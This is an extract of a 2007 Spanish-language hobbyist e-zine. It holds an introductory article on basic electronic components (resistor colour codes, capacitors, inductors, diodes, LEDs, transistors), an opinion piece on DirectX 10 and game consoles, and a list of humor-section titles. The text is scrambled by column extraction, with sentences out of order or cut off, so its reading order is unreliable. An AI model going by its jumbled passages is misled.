Esta vez vamos a aprender los componentes básicos que existen en todo circuito electrónico, puede que sea un poco tedioso, pero les prometo que mucho más divertido que lo que vimos antes y más que eso, les prometo que después de esto empezaremos a ver cosas más “concretas” como aprender un poco sobre microcontroladores y armamos algún proyecto, pero como dije, eso en la próxima entrega. Ahora bien, vamos a los componentes más básicos que podemos encontrar, estos son los Resistores, Capacitores e Inductores, estos últimos si bien están por muchos lugares no los vamos a usar por ahora así que solo los vamos a nombrar muy por arriba. Empecemos:

El dorado y el plateado se usan para indicar la tolerancia. Veamos un ejemplo del uso de los colores, si nos encontramos con una resistencia que es Amarilla, Violeta, Marron y Dorada su valor será 470 (el tercer color nos da la cantidad de ceros) y el dorado nos dice que tiene una tolerancia de 5 %, es decir su valor es de 470 ohms con un error del 5 % en su valor real. (puede tener entre 446,5 y 493,5 ohms) Veamos una aplicación del resistor, por ejemplo limitar la corriente que entra a un led (las lucecitas que vemos en todos lados, ya lo explicamos a el también) Siendo que el led por operar con alrededor de 1,5 v no puede ser conectado directamente a la batería de 9 v porque sería destruido, es que se coloca intercalado (se dice que está en “serie”) en el circuito

CUH e-zine 2ª edicion
un resistor:

Introducción a la Electrónica

compuesto por dos placas conductoras separadas por un dieléctrico, o capa de materia no conductor.

Así se ve un capacitor electrolítico:

El resistor limita la corriente, y sobre sus bornes se genera una caída de tensión, con lo que la tensión de la batería , menos la que cae sobre el resistor, tiene que ser 1,5 v de manera de garantizar el buen funcionamiento del led. Con los resistores entra en escena la ley más importante y que ya hemos visto, la Ley de ohm: I=E/R Más adelante, cuando pongamos manos a la obra repasaremos el funcionamiento del resistor, no se preocupen!!!

Inductores:
Casi no los vamos a usar, al menos no el el futuro cercano, así que solo diremos que así como el capacitor se opone a cambios bruscos de tensión, el

inductor se opone a cambios bruscos en la corriente que lo atraviesa Se usa muchas veces en fuentes de
alimentación y más que nada en circuitos de radiofrecuencia, donde su función es la de sintonía (olvídense de esto, por ahora y quién sabe si por mucho tiempo).

Capacitores:

Su símbolo es: No vamos a ahondar como con el resistor, diremos que el capacitor almacena energía eléctrica, es decir, se conecta al circuito, y se carga, para luego ser capaz de entregar esa carga cuando lo necesitemos, podemos pensar que se carga como una pila, pero su carga es efímera en el tiempo y cumple otras funciones, además de funcionar en base a principios diferentes a los de la pila. También podemos describir su funcionamiento diciendo que el capacitor se opone a cambios bruscos de tensión y es por eso que es tan utilizado para el filtrado de los voltajes en múltiples aplicaciones. (Un circuito que a su entrada tiene un capacitor no se verá afectado por un pico en la tensión que lo alimenta) La propiedad de estos componentes es la capacidad eléctrica y su unidad el Faradio (F) Los hay más comúnmente de material cerámicos, normalmente llegan a valores tan bajos hasta el orden de los picofaradios (1x10E-12 F) y electrolíticos (hechos de exteriormente de aluminio) que llegan hoy en dia a valores de hasta 1 F El capacitor elemental está

Semiconductores:
Bueno, ya vamos llegando a los componentes que todos queremos conocer, los que están basados en el silicio entre otros materiales. Entrar en la teoría de los semiconductores, en cómo funcionan y que sucede en el interior de los mismo esta mas allá del alcance que se le quiere dar a estos artículos, así que vamos a limitarnos a su utilización para más adelante poder incluirlos en nuestros proyectos. Empecemos por el más elemental:

Diodos:
Su propiedad es la de dejar pasar la corriente eléctrica en un sentido y no en el opuesto, es decir, en un cable la corriente puede ir en un sentido u otro, dependiendo solo de que lado pongamos la fuente (por ejemplo la batería) en cambio cuando tenemos un diodo, este dejara pasar la corriente

CUH e-zine 2ª edicion
solo desde su Ánodo (A) hacia su Cátodo (C ), permitiéndonos así “controlar” la corriente de una manera que hasta ahora ninguno de los componentes que conocemos nos había permitido. Su símbolo es el siguiente:

Introducción a la Electrónica

PNP. En electrónica digital, es decir dentro del mundo de los 1s y 0s, el transistor se la pasa funcionando como una interruptor, pasando de conducir a no conducir, es decir de 1 a 0 Cuando la señal que tenemos en B es una señal variable el transistor puede utilizarse para Amplificarla, es decir obtener entre C y E una copia de la señal en B, pero de mayor amplitud, este modo es más complejo de analizar, pero es el que rige el funcionamiento de los amplificadores de audio y de todo tipo.

Y su aspecto externo es

: El diodo más famoso en los últimos tiempos es el diodo Led, Light Emitting Diode, o traducido, Diodo emisor de luz. Estos diodos, funcionan como los anteriores, con la diferencia de que al circular por ellos una corriente eléctrica, emiten luz, dependiendo el color de la misma, no del plástico del cual está hecho el exterior del led, sino del tipo de material semiconductor del que está compuesto. Su aspecto es el siguiente:

Los semiconductores serán un tema recurrente y cada vez que sea necesario repasaremos su principio de funcionamiento, a no asustarse si no se entendió todo, espero que si hayan entendido algo!

Y podemos encontrarlos en todos lados hoy en día, desde la luz de numlock de nuestro teclado, hasta los semáforos de las calles (compuestos por miles de leds)

Transistores:
Fueron los que revolucionaron todo en el mundo de la electrónica, es el antes y el después de su invención, en 1947, sin ellos, nada de lo que vemos a nuestro alrededor seria igual…. Bueno, si, nosotros seriamos iguales y quizás los muebles también ;-) Los hay NPN y PNP donde lo que cambia es la , polaridad de las tres patas (NPN negativo-positivonegativo y lo contrario para el PNP)

Bueno, en la próxima empezamos con los microcontroladores para ver como todo esto puede cobrar forma y ponerse a funcionar. Gracias por su atención y hasta la próxima

El transistor es como interruptor electrónico, modo en el cual, la Base (B) del transistor al recibir una tensión permite circular corriente entre Colector (C) y Emisor (E), y entre E y C para el caso del transistor

Elektro

CUH e-zine 2ª edicion

Multimedia (Juegos)

Multimedia (Juegos)

By MadMouse

Multimedia (Juegos)
Copyright (c) 2007 MadMouSe. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front-Cover Texts, and no Back-Cover Texts. A copy of the license is included in the section entitled "GNU Free Documentation License". Hola, soy MadMouse y en esta edición de CUH EZINE les voy a hablar sobre la tecnología relacionada a los juegos de ultima generación, DirectX y la guerra de consolas que ha resurgido últimamente entre Sony y Nintendo y a la cual se ha sumado Microsoft con sus nuevas Xbox y Xbox 360. Un análisis detallado sobre DirectX 10 Figura2

Figura 3

Figura 4 Imagen comparativa de dos motores gráficos que utilizan DX 10: figuras 1 y 2 “Unreal Engine 3”, Figuras 3 y 4 derecha “Cry Engine 2”. Empecemos por el punto que todo gamer busca: calidad grafica. Con la llegada de Windows Vista y el afamado DirectX 10, una nueva era de efectos especiales ha dado comienzo; sombreado en tiempo real, ciclos de día/noche dinámicos, ambientes totalmente interactivos con niveles de física avanzada, partículas tridimensionales de alta resolución, simulación de luz solar (también en tiempo real),

Figura1

CUH e-zine 2ª edicion
nubes volumétricas, son solo algunos de los muchos ejemplo a citar de lo que es posible realizar con DX10 como ha demostrado el equipo de Crytek con su “Cry Engine 2”.

Multimedia (Juegos)

A continuación voy a detallarles los puntos fuertes y débiles de cada consola para que los que todavía no posea una y estén pensando en adquirirla tengan bases en que basar sus decisiones.

Pero a que costo? Principalmente, para poder utilizar DirectX 10 necesitamos Windows Vista, la ultima versión de Windows y una de las mas criticadas por usuarios avanzados debido a su costo, falta de innovación, mal manejo de recursos de sistema y altos requerimientos de hardware, solo para poder mantener al SO funcionando… Microsoft “obliga” a sus clientes a actualizar su SO y su hardware si es que quieren instalar DX10 en su sistema, algo que generalmente implica un gasto superior a los 2000U$ si es que no se posee ya un equipo capas de alojar Windows Vista con sus mínimas especificaciones que superan a muchos de los programas que mas recursos físicos requerían en XP además hay que , sumar la licencia de Vista, y gastos varios como los juegos tengamos en mente. Si el valor monetario no es un impedimento, queda a su disposición el probar DX 10 por si mismos, aunque les recomiendo por lómenos esperar la salida de la versión 10.1 de DirectX (de momento fechado para enero del 2008) que incluirá correcciones importantes para el aprovechamiento de sus valiosos recursos. Recuerden que la mayor parte de los usuarios de XP todavía no tienen planes de emigrar a Vista y seguirá explotando los limites de su sistema esperando una versión de DX 10 para este o apoyándose en OpenGL, el único motor grafico capas de ponerse a la altura de DX en popularidad y utilidad y que ya ha sido incorporado entre muchos juegos de ultima generación y ha demostrado ser superior a DX 9 en muchos casos. La Guerra de las consolas Desde hace años que existe una batalla entre las principales empresas productoras de consolas: Sony y Nintendo como principales lideres de la industria, sumándose Microsoft al tren de las consolas con su Xbox, una gran consola de sexta generación que compite con la PS2, el GameCube y en menor medida con el ya casi olvidado Dreamcast de SEGA.

Consolas de sexta generación (La generación actualmente más asentada, ya que la generación 7 todavía no ha alcanzado grandes escalas, sobre todo en Sudamérica) PlayStation 2: La consola líder indiscutible de la sexta generación es la de Sony. La PS2 posee una gran cantidad de títulos y sagas propias de la PSone (PSX) en conjunto con periféricos (principalmente los controles) que siguen los rasgo de su ancestro, lo que ha sido tomado bien por fanáticos de todo el mundo, ya que la PS2 parece una versión mejorada de la primera PlayStation, pudiendo esta reproducir los mismos juegos y añadiendo una cantidad de juegos de alta calidad como el “Metal Gear Solid 2: Sons of Liberty”, el “Grand Theft Auto: Vice City”, el “Final Fantasy X” o el “Dragon Ball Z: Budokai Tenkaichi 2”. El principal problema de la PS2 es su fragilidad y su amplia gama de problemas técnicos que van desde incompatibilidad de juegos entre distintos modelos, averías generales en el lente del láser o sobrecalentamiento. Xbox: La única otra alternativa real que puede satisfacer nuestras necesidades dentro de las consolas de la sexta generación es la de Microsoft, siendo esta una de las que poseen las mejores prestaciones de hardware de esta generación y también con una gran gama de títulos interesantes.

CUH e-zine 2ª edicion

Multimedia (Juegos)

Los amantes del RPG podrán disfrutar de juegos como “Fable: The lost Chapters” juego en el que encarnas en un niño y creces manipulando su destino dependiendo de la naturaleza de tus acciones podiendote convertirte en héroe o villano. En cambio, si lo que les interesa es la acción online, tienen a su disposición “Halo 2” y “Counter Strike” dos first person shooters que les garantizan horas de diversión mientras intentan escalar rangos de los “ladder” que Microsoft tiene en su comunidad online “Xbox Live” Consolas de séptima generación Nintendo WII: Nintendo vuelve al ataque con la consola a la cabeza de la séptima generación, parece que decidieron enmendar el terrible fracaso que fue la GameCube y salir adelante con una espectacular consola que atrae a todo tipo de público debido a su versatibilidad. Los controles de la WII son inalámbricos, detectan el movimiento y la aceleración en cualquier dimensión, muchos de sus juegos basan su jugavilidad en este factor clave de la consola y han logrado ganar la mayor parte del mercado.

interesantes opacan su gran hardware, el soporte para discos Blu-Ray y su gran definición (en conjunción con discos rígidos de fabrica de asta 80 Gigabytes) la hacen una consola ideal para los que disfruten de la multimedia aunque esto no basto para que fuera arrasada en el mercado. Como todas las consolas de séptima generación, cuenta con conexión a la red pero a diferencia de la Nintendo WII o la Xbox 360, con la PS3 es posible usar sistemas operativos alternativos sin hacer uso de ningún hack ni método ilegal, su hardware permite instalar distribuciones Linux sin problemas y correr en esta amplia gama de emuladores.

Xbox 360: El principal atractivo de esta consola es su comunidad online, que se organiza de manera muy similar a la de la Xbox original, permitiendo a los jugadores encontrar oponentes de su nivel fácilmente, descargar parches y actualizaciones para los juegos, o incluir nuevos mapas y misiones, ya sea comprándolos o ganándolos online. La Xbox 360 se ha ganado muchos fanáticos entre los adictos a los FPS ya que dispositivos como auricurales, micrófonos y teclados permiten una sensación parecida a la de estar frente a una PC. Como si esto no bastara, posee el almacenamiento más grande en disco de todas las consolas de séptima generación (en su versión “Elite”) para que guardemos juegos, parches o música y videos.

Mandos especiales, como una espada y un escudo para The Legend of Zelda: The Twilight Princesa han sido manufacturados para ampliar la sensación de realidad que proporciona el control de movimientos, si lo que buscan es innovación y alejarse un poco de la jugavilidad clásica de las consolas, con la WII van a tener mas que suficiente. PlayStation 3: Sony dio un paso en falso con esta consola, un elevadísimo precio y pocos títulos

CUH e-zine 2ª edicion
Topic

Off

Off topic - Humor

By Editorial

Alimento para Spammers

Chistes Gráficos

Ctrl +Alt + Supr

Sql Injection

Bad Boy

CUH e-zine 2ª edicion
Topic

Off

Php & MySql

Imágenes con doble sentido

Chistes picantes

Curiosidades

CUH e-zine 2ª edicion
Topic

Off

SexyMouse

Un real Geek

Programacion

Varias

Montajes Photoshop

CUH e-zine 2ª edicion
Topic

Off

Sign up to vote on this title
UsefulNot useful